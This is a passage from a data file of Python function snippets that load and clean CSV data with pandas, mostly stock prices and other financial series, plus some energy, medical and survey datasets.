getArrayValue(df[vectorField])\n\n if \"CashflowKey\" not in df.columns:\n df[\"CashflowKey\"] = \"-\"\n\n tradeTbl.load_pandas(df[tradeTbl.columns])\n sensiTbl.load_pandas(df[sensiTbl.columns])", "def process(self, inputs):\n df = cudf.read_csv(self.conf['path'])\n # extract the year, month, day\n ymd = df['DTE'].astype('str').str.extract(r'(\\d\\d\\d\\d)(\\d\\d)(\\d\\d)')\n # construct the standard datetime str\n df['DTE'] = ymd[0].str.cat(ymd[1],\n '-').str.cat(ymd[2],\n '-').astype('datetime64[ms]')\n df = df[['DTE', 'OPEN', 'CLOSE', 'HIGH', 'LOW', 'SM_ID', 'VOLUME']]\n df['VOLUME'] /= 1000\n # change the names\n df.columns = ['datetime', 'open', 'close',\n 'high', 'low', \"asset\", 'volume']\n return df", "def create_df(filename):\n data = pd.read_csv(filename)\n data = data.dropna(axis='index')\n data['inc_angle'] = np.radians(data['inc_angle'])\n data = data.astype('float64')\n data = data[data['inc_angle'] <= np.deg2rad(80)]\n return data", "def readAllDatForCurrency(data_dir, currencyCode):\n datatestnames = list(filter(lambda a : (currencyCode in a), listdir(data_dir)))\n dfs = [readDAT(data_dir + name) for name in datatestnames]\n allDf = pd.concat(dfs)\n allDf = allDf.sort_values(by=['datetime'], ascending=True).reset_index(drop=True).set_index('datetime')\n return allDf", "def get_price_info(price_filename, commodity):\n prices = []\n prices = pd.read_csv(price_filename, sep=' ', index_col=0)\n\n five_day_avg = pd.Series(pd.rolling_mean(prices[commodity], 5), name='five_day_avg')\n ten_day_avg = pd.Series(pd.rolling_mean(prices[commodity], 10), name='ten_day_avg')\n thirty_day_avg = pd.Series(pd.rolling_mean(prices[commodity], 30), name='thirty_day_avg')\n \n price_info = pd.DataFrame(pd.concat([prices, five_day_avg, ten_day_avg, thirty_day_avg], axis=1))\n \n price_diffs = prices[commodity].diff()\n # price_changes_series = pd.Series(np.array(price_diffs > 0), dtype=int, index=price_info.index.values)\n price_changes_series = pd.Series([0.333 if (np.isnan(x) or np.isnan(y)) else 100000.0 * x / y for (x, y) in zip(price_diffs, prices[commodity])], dtype=int, index=price_info.index.values)\n price_changes_series = prices[commodity]\n return price_info, price_changes_series", "def get_price_df(url):\n df = pd.read_csv(url).dropna()\n df.index = pd.to_datetime(df['Date'])\n df = df.drop(columns=['Date'])\n return df", "def get_data():\n input_dfs = []\n\n # get data folder\n parent_path = get_parent_dir(os.path.abspath(__file__), 2)\n data_folder = str(parent_path + os.path.join(folder_name))\n assert os.path.exists(data_folder) == True, \"The specified data folder cannot be located.\"\n\n # Load and pre process input data\n # Descriptive statistics used (per http://journals.plos.org/plosone/article?id=10.1371/journal.pone.0155133):\n # * BIAS(n): Measures the divergence of the current log return from an n-day moving \n # average of log returns. We let n = 6. \n # * PSY(n): Psychological line is a proxy for market sentiment.\n # * ASY(n): The average return in the last n days.\n # * OBV: The average return in the last n days.\n\n # ASX SPI 200 Index Futures, Continuous Contract #2 (AP2)\n df_asx_200 = pd.read_csv(os.path.join(data_folder, \"AXJO.csv\"), index_col=0, parse_dates=True)\n df_asx_200 = process_input_df(df_asx_200, 'AXJO', 'Close')\n\n df_asx_200['log_r'] = np.log(df_asx_200['close']).diff() * 100\n df_asx_200['ma5_r'] = df_asx_200['log_r'].shift(1).rolling(window=5).sum()\n df_asx_200['bias6_r'] = df_asx_200['log_r'].shift(1) - df_asx_200['log_r'].shift(1).rolling(window=6).sum()\n df_asx_200['psy12_r'] = (df_asx_200['log_r'].shift(1).rolling(window=12, min_periods=12)\n .agg(lambda x: (x > 0).sum())) / 12\n\n # ASX Trading Volumes (Daily)\n df_asx_vol = pd.read_csv(os.path.join(data_folder, \"asx_volume.csv\"), index_col=0, parse_dates=True)\n input_dfs.append(process_input_df(df_asx_vol, 'volume', 'AS51 Index'))\n\n # Dow Jones Industrial Average\n df_dji = pd.read_csv(os.path.join(data_folder, \"DJI.csv\"), index_col=0, parse_dates=True)\n input_dfs.append(process_input_df(df_dji, 'dji', 'Close'))\n\n # Create final data frame with all required input and output data\n output_fml = np.where(df_asx_200['log_r'] > 0, 1, 0)\n df_asx_200.insert(loc=1, column='output', value=output_fml)\n df_asx_200.drop('close', axis=1, inplace=True)\n df_asx_200.drop('log_r', axis=1, inplace=True)\n\n for df in input_dfs:\n df.drop('close', axis=1, inplace=True)\n df_asx_200 = pd.merge(df_asx_200, df, how='inner', left_index=True, right_index=True)\n\n # Drop all rows with na values - will not effect drivers for date\n df_asx_200 = df_asx_200.dropna(axis=0, how='any')\n\n return df_asx_200", "def get_data(fpath):\n\n visits = ['SC', 'BL', 'V01', 'V02', 'V03', 'V04', 'V05', 'V06', 'V07',\n 'V08', 'V09', 'V10', 'V11', 'V12', 'V13', 'V14', 'V15']\n dtype = dict(PATNO=str,\n CLINICAL_EVENT=cdtype(visits, ordered=True),\n TESTNAME=str,\n TESTVALUE=str)\n\n fname = op.join(fpath, 'Current_Biospecimen_Analysis_Results.csv')\n data = pd.read_csv(fname, dtype=dtype)\n\n data['TESTVALUE'] = pd.to_numeric(data.TESTVALUE, errors='coerce')\n data = data.rename(columns=RENAME_COLS).assign(**ASSIGN_COLS)[RETAIN_COLS]\n data = data.dropna(axis=0, subset=['SCORE'])\n\n return data", "def load_data(data_path='./data/'):\n # Electricity prices for 1.1.2014 - 14.10.2016 [e/MWh]\n prices = pd.read_csv(data_path + 'prices.csv', sep=\";\", decimal=\",\", names=['ts','blockid','price'], skiprows=1)\n prices['ts'] = pd.to_datetime(prices.ts, format='%d.%m.%Y %H:%M')\n prices.set_index('ts',inplace=True)\n \n # Paper item consumptions [MWh/block]\n items = pd.read_csv(data_path + 'items.csv', sep=\";\", decimal=\",\", names=['item','consumption'], skiprows=1)\n \n # One realized schedule, 75 blocks for 29.9.2016 - 11.10.2016\n schedule = pd.read_csv(data_path + 'schedule.csv', sep=\";\", decimal=\",\")\n schedule.columns = ['ts','blockid'] + itemnames() + ['price']\n schedule['ts'] = pd.to_datetime(schedule.ts, format='%d.%m.%Y %H:%M')\n return(prices,items,schedule)", "def get_existing_data_for_ticker(ticker):\n filename = get_filename_for_ticker(ticker)\n logger.debug(f'Processing {filename}')\n df_ticker_data = pd.DataFrame()\n try:\n df_ticker_data = pd.read_csv(filename, index_col='Date')\n df_ticker_data.index = pd.to_datetime(df_ticker_data.index)\n except FileNotFoundError:\n logger.error(f'Error in opening {filename}')\n except Exception as e:\n logging.error(f'Error {e} while accessing existing data')\n return df_ticker_data", "def _read_csv(self) -> pd.DataFrame:\n\n return pd.concat(\n [\n pd.read_csv(f, usecols=[1, 2, 3, 4, 5])\n for f in self.temp_path.iterdir()\n if f.name.endswith(\".csv\")\n ]\n )", "def _open_csv_file(self):\n for s in self.symbol_list:\n self.symbol_data[s] = pd.read_csv(\n os.path.join(self.csv_dir, '%s.csv' % s),\n header=0, parse_dates=True,\n\n )\n self.symbol_data[s] = self.symbol_data[s][self.symbol_data[s]['Time'] >= self.start_time]\n self.symbol_data[s] = self.symbol_data[s][self.symbol_data[s]['Time'] <= self.end_time]\n for s in self.symbol_list:\n self.symbol_data[s] = self.symbol_data[s].iterrows()", "def create_dataframe_from_dir(directory):\n\n if not os.path.exists(directory):\n return pd.DataFrame()\n\n file_list = os.listdir(directory)\n\n file_list.sort()\n\n df_list = []\n for filename in file_list:\n\n if filename.startswith(\"_\") or (not filename.endswith(\".csv\")):\n continue\n\n # Assert that the file is named correctly\n _, start_date, end_date = check_filename_convention(filename)\n\n df = pd.read_csv(os.path.join(directory, filename))\n df = df.assign(SourceFile=filename)\n\n # In January 2020, MS changed the date format used in the usage\n # export files from US to UK. This happen between 24/01/2020 -\n # 28/01/2020. The following if statement is to deal with this\n # change.\n if start_date is None or end_date is None:\n continue\n\n if start_date > datetime.datetime(2020, 1, 24, 0, 0):\n try:\n df[CONST_COL_NAME_DATE] = pd.to_datetime(\n df[CONST_COL_NAME_DATE], format=\"%d/%m/%Y\"\n )\n except Exception:\n try:\n df[CONST_COL_NAME_DATE] = pd.to_datetime(\n df[CONST_COL_NAME_DATE], format=\"%m/%d/%Y\"\n )\n except Exception:\n df[CONST_COL_NAME_DATE] = pd.to_datetime(\n df[CONST_COL_NAME_DATE], format=\"%Y-%m-%d\"\n )\n else:\n try:\n df[CONST_COL_NAME_DATE] = pd.to_datetime(\n df[CONST_COL_NAME_DATE], format=\"%m/%d/%Y\"\n )\n except Exception:\n try:\n df[CONST_COL_NAME_DATE] = pd.to_datetime(\n df[CONST_COL_NAME_DATE], format=\"%d/%m/%Y\"\n )\n except Exception:\n df[CONST_COL_NAME_DATE] = pd.to_datetime(\n df[CONST_COL_NAME_DATE], format=\"%Y-%m-%d\"\n )\n\n # Check if data comes from EduHub\n if CONST_COL_NAME_HANDOUTNAME in df.columns:\n\n # Renaming HandoutName to SubscriptionName\n df = df.rename(\n columns={CONST_COL_NAME_HANDOUTNAME: CONST_COL_NAME_SNAME}\n )\n\n # Dropping columns CourseName,LabName\n df = df.drop(\n columns=[CONST_COL_NAME_LABNAME, CONST_COL_NAME_COURSENAME]\n )\n\n df_list.append(df)\n\n if len(df_list) == 0:\n return pd.DataFrame()\n\n total_df = pd.concat(df_list, axis=0, ignore_index=True)\n\n return total_df", "def get_stock_data(path):\n prices = pd.read_csv(path, index_col='Date', parse_dates=True,\n usecols=['Date', 'Close'], na_values=['nan'])\n dates = pd.date_range('2019-02-13', '2020-07-28')\n df = pd.DataFrame(index=dates)\n df = df.join(prices)\n df = df.dropna()\n reversed_df = df.iloc[::-1]\n return reversed_df", "def get_data(symbols, dates):\n \n df = pd.DataFrame(index=dates)\n if 'SPY' not in symbols:\n symbols.insert(0,'SPY')\n for symbol in symbols:\n \n df1 = pd.read_csv(symbol_to_path(symbol),usecols=['Date','Adj Close'],\n index_col='Date',na_values =['nan'] )\n df1 = df1.rename(columns ={\"Adj Close\": symbol}) \n #print df1\n df = df.join(df1,how='inner')\n \n return df.sort_index()", "def __get_all_data(self,tickr):\n self.__csvurl=f\"https://query1.finance.yahoo.com/v7/finance/download/{tickr}?period1=1092873600&period2={int(datetime.now().timestamp())}&interval=1d&events=history&includeAdjustedClose=true\"\n s=get_historic_data(self.__csvurl)\n\n \"\"\"you should not be able to access dataframe from outside the class\"\"\"\n df=pd.read_csv(io.StringIO(s.decode('utf-8')))\n df=df.dropna()\n df_columns=['Date','High','Low','Close','Adj Close']\n\n if not set(df_columns).issubset(df.columns):\n raise ValueError(f\"One or more columns are missing {df_columns}\")\n\n if len(df.index)<5:\n raise ValueError(f\"Cannot calculate EMA 5\")\n\n if len(df.index)<20:\n raise ValueError(f\"Cannot calculate SMA 20\")\n\n \"\"\"set date as index (required for filtering,sorting,grouping etc etc\"\"\"\n df['Date'] = pd.to_datetime(df['Date'], format = '%Y-%m-%d')\n\n df.set_index(['Date'], inplace=True)\n\n\n return df", "def _load_price_csv(symbol):\n with open(f\"data_public/prices-{symbol}.csv\", \"r\") as csvfile:\n price_by_date = {}\n reader = csv.reader(csvfile, delimiter=',')\n next(reader) # discard header\n for row in reader:\n price_by_date[row[0]] = float(row[1])\n return price_by_date", "def csv_loader(csv_file):\n df = pd.read_csv(csv_file, sep=';', parse_dates=['Data_Alteraçao'])\n pd.set_option('display.float_format', '{:.0f}'.format)\n\n df = df.fillna(0)\n df = df.drop(columns=['Cod. Pareamento', 'Cod. UF', 'Sigla UF', 'Cod. Subarea',\n 'Nome Subarea', 'Cod. Municipio', 'Nome Municipio', 'Codigo Agencia',\n 'Nome Agencia', 'Cod. Setor', 'Cod. Logradouro CNEFE',\n 'Tipo Logradouro CNEFE', 'Titulo Logradouro CNEFE',\n 'Nome Logradouro CNEFE', 'Nome Tratado CNEFE', 'Tipo Logradouro DNE',\n 'Titulo Logradouro DNE', 'Nome Logradouro DNE', 'Nome Tratado DNE',\n 'Logradouro Completo DNE', 'Distancia', 'Cod. Match', 'Motivo Match',\n 'CEPs Face', 'Localidade Face',\n 'Alterar Logradouro para DNE?', 'Observaçao', 'SIAPE Alteração',\n 'Nome Alteraçao', 'Data_Alteraçao', 'Status', 'Unnamed: 33'])\n\n # df.astype({'CEP Logradouro CNEFE': 'int32'}).dtypes\n\n df['CEP'] = df['CEP'].str.replace(' ', '', regex=False)\n\n ceps_dne = []\n for index, row in df.iterrows():\n if type(row.CEP) == str:\n for cep in row.CEP.split(','):\n # print(index, cep)\n ceps_dne.append(int(cep))\n\n ceps_cnefe = df['CEP Logradouro CNEFE'].astype(int).tolist()\n ceps = ceps_dne + ceps_cnefe\n ceps = list(set(ceps))\n return pd.Series(ceps)", "def get_data(symbols, dates, base_dir=\"../data/\"):\n df = pd.DataFrame(index=dates)\n if 'SPY' not in symbols:\n symbols.insert(0, 'SPY')\n\n for symbol in symbols:\n temp_df = pd.read_csv(symbol_to_path(symbol, base_dir), index_col='Date',\n parse_dates=True, usecols=['Date', 'Close'],\n na_values=['nan'])\n temp_df = temp_df.rename(columns={'Close': symbol})\n df = df.join(temp_df, how='inner')\n return df", "def get_data(path):\n df = pd.read_csv(path)\n\n return df", "def process_file_pd(file_name):\n try:\n df = pd.read_csv(file_name)\n return df\n except OSError as e:\n print('Error' + str(e))\n raise", "def prepare_dataframe(input_path, index_col=\"label\"):\n df = pd.read_csv(input_path, index_col=index_col)\n df = df[df.power_technology != \"IGCC\"]\n df = df[df.region != \"China\"]\n\n df.loc[:, \"delta_capex\"] = df.loc[:, \"capital_cost_cc\"] - df.loc[:, \"capital_cost\"]\n df.loc[:, \"delta_lcoe_capex\"] = df.loc[:, \"lcoe_capex_cc\"] - df.loc[:, \"lcoe_capex\"]\n df.loc[:, \"delta_om\"] = df.loc[:, \"lcoe_om_cc\"] - df.loc[:, \"lcoe_om\"]\n df.loc[:, \"delta_heatrate\"] = df.loc[:, \"heat_rate_cc\"] - df.loc[:, \"heat_rate\"]\n return df", "def readCsv(variables, path, pathCsv, estacion):\n # os.makedirs('../data/totalData/')\n dataVa = df.DataFrame()\n variables = variables\n mypath = path\n patron = re.compile(variables + '_'+estacion+'_\\d\\d\\d\\d-\\d\\d-\\d\\d' + '.*')\n for base, dirs, filess in os.walk(mypath, topdown=False):\n filess = sorted(filess)\n for value in filess:\n if patron.match(value) != None:\n tempData = df.read_csv(mypath + value)\n #tempData = completeMet(tempData)\n tempData = tempData.iloc[0:24, :]\n dataVa = concat([tempData, dataVa], axis=0)\n dataVa = dataVa.reset_index()\n dataVa = dataVa.drop(labels='index', axis=1)\n dataVa.to_csv(pathCsv + variables + '_'+ estacion +'_total.csv', encoding='utf-8', index=False)\n dataVa = df.DataFrame()", "def get_data(ticker, tickers):\n \n print(ticker)\n ## Date setting\n today = datetime.today()\n days_ago_90 = today - timedelta(days = 90)\n today = today.strftime(\"%Y-%m-%d\")\n days_ago_90 = days_ago_90.strftime(\"%Y-%m-%d\")\n \n df_ticker = web.DataReader(ticker, 'yahoo', start = days_ago_90, end = today)\n \n ## To get prices, iloc is used. It's because shifting by timedetlas will result in error in cases where some holidays occured \n price_most_recent = df_ticker.iloc[-1, 5]\n price_7_days_ago = df_ticker.iloc[-7, 5]\n price_21_days_ago = df_ticker.iloc[-21, 5]\n price_30_days_ago = df_ticker.iloc[-30, 5]\n price_90_days_ago = df_ticker.iloc[0,5]\n \n ## Getting price change\n price_change_7_days = price_change(price_most_recent, price_7_days_ago)\n price_change_21_days = price_change(price_most_recent, price_21_days_ago)\n price_change_30_days = price_change(price_most_recent, price_30_days_ago)\n price_change_90_days = price_change(price_most_recent, price_90_days_ago)\n \n ## Checking for constant price drop\n constant_price_drop_7 = constant_price_drop_detector(df_ticker, 7)\n ## Only if price drops constantly for 7 days it makes sense to check for this pattern in 21 days period\n if constant_price_drop_7 == \"YES\":\n constant_price_drop_21 = constant_price_drop_detector(df_ticker, 21)\n else:\n constant_price_drop_21 = \"NO\"\n \n ## Now creating the final df to return\n df_prices = df_ticker[['Adj Close']].T\n df_prices.index = [ticker]\n df_prices.reset_index(inplace = True)\n \n full_name = tickers.loc[tickers[\"Ticker\"] == ticker, 'Full Name'].values[0]\n df_prices['company_name'] = full_name\n df_prices['price_90_days_ago'] = price_90_days_ago\n df_prices['price_30_days_ago'] = price_30_days_ago\n df_prices['price_21_days_ago'] = price_21_days_ago\n df_prices['price_7_days_ago'] = price_7_days_ago\n df_prices['price_most_recent'] = price_most_recent\n \n df_prices['price_change_7_days'] = price_change_7_days\n df_prices['price_change_21_days'] = price_change_21_days\n df_prices['price_change_30_days'] = price_change_30_days\n df_prices['price_change_90_days'] = price_change_90_days\n \n df_prices['constant_price_drop_7'] = constant_price_drop_7\n df_prices['constant_price_drop_21'] = constant_price_drop_21\n \n df_prices.fillna(\"None\", inplace = True)\n \n return df_prices", "def clean_positions(path):\n columnas = [\n PositionsRaw.PRICE,\n PositionsRaw.PRODUCT,\n PositionsRaw.ISIN,\n PositionsRaw.QUANTITY,\n PositionsRaw.VALUE_LOCAL,\n PositionsRaw.VALUE_EUR,\n ]\n\n long = pd.DataFrame(columns=columnas)\n\n files = list(path.glob(\"pos*.csv\"))\n for file in tqdm(files):\n\n # ---------------------------------------------------------------------\n # Read file\n try:\n positions_day = pd.read_csv(file)\n except EmptyDataError:\n continue\n\n # ---------------------------------------------------------------------\n # Replace commas with dots\n columns_to_clean = [\n PositionsRaw.PRICE,\n PositionsRaw.VALUE_EUR,\n PositionsRaw.VALUE_LOCAL,\n ]\n positions_day[columns_to_clean] = replace_values(\n frame=positions_day[columns_to_clean],\n old=\",\",\n new=\".\",\n )\n\n # ---------------------------------------------------------------------\n # Extract numerical values\n columns_to_extract = [\n PositionsRaw.VALUE_EUR,\n PositionsRaw.VALUE_LOCAL,\n ]\n positions_day[columns_to_extract] = extract_numbers(\n positions_day[columns_to_extract]\n )\n\n # ---------------------------------------------------------------------\n # Convert to float and string\n columns_to_float = [\n PositionsRaw.QUANTITY,\n PositionsRaw.PRICE,\n PositionsRaw.VALUE_EUR,\n PositionsRaw.VALUE_LOCAL,\n ]\n positions_day[columns_to_float] = positions_day[columns_to_float].astype(float)\n\n columns_to_string = [PositionsRaw.ISIN, PositionsRaw.PRODUCT]\n positions_day = positions_day.fillna(\"-\")\n positions_day[columns_to_string] = positions_day[columns_to_string].astype(str)\n positions_day = positions_day.replace(\"-\", np.nan)\n\n # ---------------------------------------------------------------------\n # Add valuation date\n date = file.stem.split(\"_\")[-1]\n positions_day[Positions.DATE] = date\n\n # ---------------------------------------------------------------------\n # Append to dataframe\n long = pd.concat([long, positions_day], axis=0)\n\n # -------------------------------------------------------------------------\n # Convert dates to Datetime\n long[Positions.DATE] = pd.to_datetime(long[Positions.DATE])\n\n # -------------------------------------------------------------------------\n # Rename columns to structured names\n map_columnas = {\n PositionsRaw.PRODUCT: Positions.NAME,\n PositionsRaw.ISIN: Positions.ISIN,\n PositionsRaw.QUANTITY: Positions.SHARES,\n PositionsRaw.PRICE: Positions.PRICE,\n PositionsRaw.VALUE_LOCAL: Positions.VALUE_LOCAL,\n PositionsRaw.VALUE_EUR: Positions.VALUE_PORTFOLIO,\n }\n\n long = long.rename(columns=map_columnas)\n\n # -------------------------------------------------------------------------\n # Add position type\n mask_has_isin = long[Positions.ISIN].notna()\n\n long.loc[mask_has_isin, Positions.TYPE] = AssetType.ASSET\n long.loc[~mask_has_isin, Positions.TYPE] = AssetType.CASH\n\n # -------------------------------------------------------------------------\n # Sort by date\n long = long.sort_values(by=Positions.DATE)\n long = long.reset_index(drop=True)\n\n return long", "def whole_data(arg_file_names_list):\r\n\r\n whole_data_list = []\r\n # loop which iterates through the directory and executes function vat_return_reader for each file\r\n for file_name in arg_file_names_list:\r\n whole_data_list.append(vat_return_reader(file_name))\r\n # creates data frame from list\r\n df = pd.DataFrame(whole_data_list)\r\n # adds total row \r\n df = pd.concat([df,pd.DataFrame(df.sum(axis=0),columns=['Total']).T])\r\n return df", "def read_data(filepath):\n df = pd.read_csv(filepath)\n return df", "def read_data(filepath):\n df = pd.read_csv(filepath)\n return df", "def read_data(filepath):\n df = pd.read_csv(filepath)\n return df", "def read_elia_imbalanceprices(filename,status):\r\n \r\n df = pd.read_excel(filename,skiprows=1,parse_dates=False)\r\n df[\"Timestamp\"] = df[\"Date\"]+\" \"+df['Quarter'].map(lambda x: str(x)[:-9])\r\n pd.to_datetime(df[\"Timestamp\"])\r\n df.set_index(\"Timestamp\",inplace=True)\r\n if ((status == \"validated\") | (status == \"valid\")):\r\n df = df.drop(df[df.Status != \"Validated\"].index)\r\n df = df.drop([\"Date\",\"Quarter\",\"Status\"], axis=1)\r\n \r\n if len(df.columns) == 3:\r\n df.columns.values[0:3] = [\"NRV in MW\",\"POS in euro/MWh\", \"NEG in euro/MWh\"]\r\n \r\n if len(df.columns) == 7:\r\n df.columns.values[0:7] = [\"NRV in MW\",\"SI in MW\",\"alpha in euro/MWh\",\"MIP in euro/MWh\", \"MDP in euro/MWh\",\"POS in euro/MWh\", \"NEG in euro/MWh\"]\r\n \r\n if len(df.columns) == 8:\r\n df.columns.values[0:8] = [\"NRV in MW\",\"SI in MW\",\"alpha in euro/MWh\",\"MIP in euro/MWh\", \"MDP in euro/MWh\",\"SR in euro/MWh\",\"POS in euro/MWh\", \"NEG in euro/MWh\"]\r\n\r\n return df", "def ticketing_data_import(file_name, path=path):\n \n accepted_file_names = [\"Clx\", \"Pops\", \"Summer\", \"Chamber\", \"Connections\",\n \"Family\", \"Organ\", \"Specials\"]\n \n if file_name not in accepted_file_names:\n raise ValueError('file_name must be of accepted file types: ', \n accepted_file_names)\n \n files = [pd.read_csv(path + file_name + fy + \".csv\", skiprows=3) for fy in fiscal_years]\n tix_raw = pd.concat(files, ignore_index=True)\n \n return tix_raw", "def data_from_csv(self, filepath):\n self.dataframe = pd.load_csv(filepath, separator='')", "def parse_csv_files(csv_files, **kwargs):\n\n per_token_savings = defaultdict(lambda: defaultdict(lambda: defaultdict(list)))\n slip_price_diff_splits = defaultdict(lambda: defaultdict(lambda: defaultdict(list)))\n\n for file in csv_files:\n per_file_base_prices = {}\n for _, _, trade_size, token, exchange, exchange_price, _, totle_price, pct_savings, splits, _ in csv_row_gen(file, **kwargs):\n if not per_file_base_prices.get(token): # this assumes prices recorded from lowest to highest for a token\n per_file_base_prices[token] = totle_price # should be same for all aggs, but is slightly different sometimes\n\n slip = (totle_price / per_file_base_prices[token]) - 1.0 # should be 0 for the lowest trade_size\n # i.e. slip = (totle_price - per_file_base_prices[token]) / per_file_base_prices[token]\n\n slip = 0.0 if slip < 0.0 and slip > -0.00001 else slip # get rid of -0.0000\n price_diff = (totle_price - exchange_price) / exchange_price\n\n slip_price_diff_splits[token][trade_size][exchange].append((slip, price_diff, splits))\n per_token_savings[token][trade_size][exchange].append(pct_savings)\n\n\n return per_token_savings, slip_price_diff_splits", "def filter_data_on_complaince(folder_Path,complaince_rate):\n complaince_df=pd.read_csv(folder_Path+\"complaince.csv\")\n complaince_df['Percent'] = complaince_df['Percent'].apply(converters.ConvertPercent)\n complaince_df = complaince_df.loc[complaince_df.Percent >= complaince_rate]\n IDs= complaince_df.ID.unique()\n # print(IDs)\n df_apps=pd.read_csv(folder_Path+\"app_usage.csv\")\n df_apps = df_apps.loc[df_apps.user_id.isin(IDs)]\n df_apps = df_apps.reset_index(drop=True)\n df_apps.to_csv(folder_Path+\"Filtered/app_usage.csv\")\n\n\n df_battery= pd.read_csv(folder_Path+\"battery_events.csv\")\n df_battery= df_battery.loc[df_battery.user_id.isin(IDs)]\n df_battery = df_battery.reset_index(drop=True)\n df_battery.to_csv(folder_Path+\"Filtered/battery_events.csv\")\n\n\n df_bluetooth = pd.read_csv(folder_Path+\"bluetooth.csv\")\n df_bluetooth = df_bluetooth.loc[df_bluetooth.user_id.isin(IDs)]\n df_bluetooth = df_bluetooth.reset_index(drop=True)\n df_bluetooth.to_csv(folder_Path+\"Filtered/bluetooth.csv\")\n\n df_screen = pd.read_csv(folder_Path+\"screenstate.csv\")\n df_screen = df_screen.loc[df_screen.user_id.isin(IDs)]\n df_screen = df_screen.reset_index(drop=True)\n df_screen.to_csv(folder_Path+\"Filtered/screenstate.csv\")\n\n\n df_wifi = pd.read_csv(folder_Path+\"wifi.csv\")\n df_wifi = df_wifi.loc[df_wifi.user_id.isin(IDs)]\n df_wifi = df_wifi.reset_index(drop=True)\n df_wifi.to_csv(folder_Path+\"Filtered/wifi.csv\")", "def load_vix_futures_prices(source_dir, price='Close',\n start_year=2005, end_year=2099):\n\n data = {}\n\n files = glob.glob(os.path.join(source_dir, 'CFE_*'))\n for f in files:\n filename = os.path.basename(f)\n month = FUTURES_MONTHS.index(filename[4])\n year = int('20' + filename[5] + filename[6])\n\n if year < start_year or year > end_year:\n continue\n\n try:\n df = load_symbol_data(f, index=0, header_row=0)\n except IndexError:\n df = load_symbol_data(f, index=0, header_row=1)\n\n if year not in data:\n data[year] = 12 * [None]\n data[year][month] = df[price]\n\n return data", "def get_data(symbols, dates):\n df = pd.DataFrame(index=dates)\n if \"SPY\" not in symbols:\n symbols.insert(0, \"SPY\")\n for symbol in symbols:\n temp = pd.read_csv(symbol_to_path(symbol, base_dir=\"data\"), \n index_col=\"Date\", \n parse_dates=True, \n usecols=[\"Date\", \"Adj Close\"])\n \n temp = temp.rename(columns={\"Adj Close\": symbol})\n \n df = df.join(temp, how=\"inner\")\n df = df.sort_index(axis=0, ascending=[1])\n \n return df", "def get_data(symbols, dates):\n df = pd.DataFrame(index=dates)\n \n if 'SPY' not in symbols: #add SPY for reference\n symbols.insert(0,'SPY')\n \n # This for loop will loop through all the desired\n # symbols in the symbol list and create a dataframe\n # containing all the required data\n for symbol in symbols:\n # Get path for .csv file for symbol\n sym_path = symbol_to_path(symbol)\n # Load data from csv and create dataframe\n if symbol == 'SPY':\n dfSPY = pd.read_csv(sym_path,\n index_col=\"Date\",\n parse_dates=True,\n usecols=[\"Date\",\"Adj Close\"],\n na_values=['nan'])\n \n dfSPY = dfSPY.rename(columns={\"Adj Close\": str(symbol)})\n df = df.join(dfSPY,how='inner') # inner joins and drops NaN\n else:\n df_temp = pd.read_csv(sym_path,\n index_col=\"Date\",\n parse_dates=True,\n usecols=[\"Date\",\"Adj Close\"],\n na_values=['nan'])\n df_temp = df_temp.rename(columns={\"Adj Close\": str(symbol)})\n df = df.join(df_temp,how='inner')\n df = df.sort_index(ascending=True)\n return df", "def import_data():\n import pandas as pd\n \n df = pd.read_csv('Company_Bankruptcy_Prediction.csv')\n return df", "def open_file(path):\r\n f = open(path, encoding='utf-8', errors='ignore')\r\n data = f.readlines()\r\n lst_with_data = []\r\n for i in data:\r\n i = i.replace('\"', ' ').replace(\"\\t\", ' ').replace(\"\\n\", \" \").replace(\"'\", ' ').split(' ')\r\n lst_with_data.append(i)\r\n res_lst = [] \r\n for i in lst_with_data:\r\n append_lst = []\r\n for j in i:\r\n if j.isdigit() or j == \"-\":\r\n append_lst.append(j) \r\n if len(append_lst) != 0: \r\n res_lst.append(append_lst) \r\n res_lst = res_lst[1:]\r\n res = [] \r\n for i in res_lst:\r\n if len(i) != len(res_lst[0]):\r\n i = i[1:]\r\n res.append(i) \r\n else:\r\n res.append(i) \r\n ln = len(res[0])\r\n data_by_years = []\r\n for i in range(ln):\r\n data_y = []\r\n for j in res:\r\n data_y.append(j[i])\r\n data_by_years.append(data_y) \r\n dict_by_years = {}\r\n dict_with_total = file_with_total_inform(\"Total_Lviv.csv\")\r\n for i in data_by_years:\r\n dict_by_years[int(i[0])] = causes(i)\r\n dict_by_years[int(i[0])].update({\"Total\": dict_with_total[i[0]]})\r\n res_dict = {}\r\n res_dict[\"Lviv\"] = dict_by_years \r\n return res_dict", "def clean_stockdata(filename):\n pct_cols = ['Change',\n 'Dividend Yield',\n 'EPS growth next 5 years',\n 'EPS growth past 5 years',\n 'Float Short',\n 'Performance (Half Year)',\n 'Performance (Month)',\n 'Performance (Quarter)',\n 'Performance (Week)',\n 'Performance (YTD)',\n 'Performance (Year)',\n 'Sales growth past 5 years',\n 'Payout Ratio',\n 'EPS (ttm)',\n 'EPS growth this year',\n 'EPS growth next year',\n 'EPS growth past 5 years',\n 'EPS growth next 5 years',\n 'Sales growth past 5 years',\n 'EPS growth quarter over quarter',\n 'Sales growth quarter over quarter',\n 'Insider Ownership',\n 'Insider Transactions',\n 'Institutional Ownership',\n 'Institutional Transactions',\n 'Float Short',\n 'Return on Assets',\n 'Return on Equity',\n 'Return on Investment',\n 'Gross Margin',\n 'Operating Margin',\n 'Profit Margin',\n 'Volatility (Week)',\n 'Volatility (Month)',\n '20-Day Simple Moving Average',\n '50-Day Simple Moving Average',\n '200-Day Simple Moving Average',\n '50-Day High',\n '50-Day Low',\n '52-Week High',\n '52-Week Low',\n 'Change from Open',\n 'Gap',\n 'Change']\n df = pd.read_csv(filename)\n df[pct_cols] = df[pct_cols].applymap(clean_pcts)\n df.drop('No.', axis=1, inplace=True)\n df.to_csv(filename, index=False)", "def get_data(symbols, dates):\n df = pd.DataFrame(index=dates)\n if 'SPY' not in symbols: # add SPY for reference, if absent\n symbols.insert(0, 'SPY')\n\n for symbol in symbols:\n # TODO: Read and join data for each symbol\n if os.path.isfile(symbol_to_path(symbol)): \n df_temp = pd.read_csv(symbol_to_path(symbol), index_col='Date', \n parse_dates = True, usecols=['Date', 'Adj Close'], na_values=['nan'])\n df_temp = df_temp.rename(columns = {'Adj Close': symbol})\n df = df.join(df_temp)\n if symbol == 'SPY': #drop dates SPY did not trade\n df = df.dropna(subset=[\"SPY\"])\n# else:\n# download_symbol(symbol) \n return df", "def open_file(stock, name, setup=False):\n if not isinstance(stock, str):\n raise TypeError(\"Parameter 'stock' should be a string, not a \"\n + type(stock).__name__)\n if setup is True: # when setup, name is \"AAPL_income.csv\", not 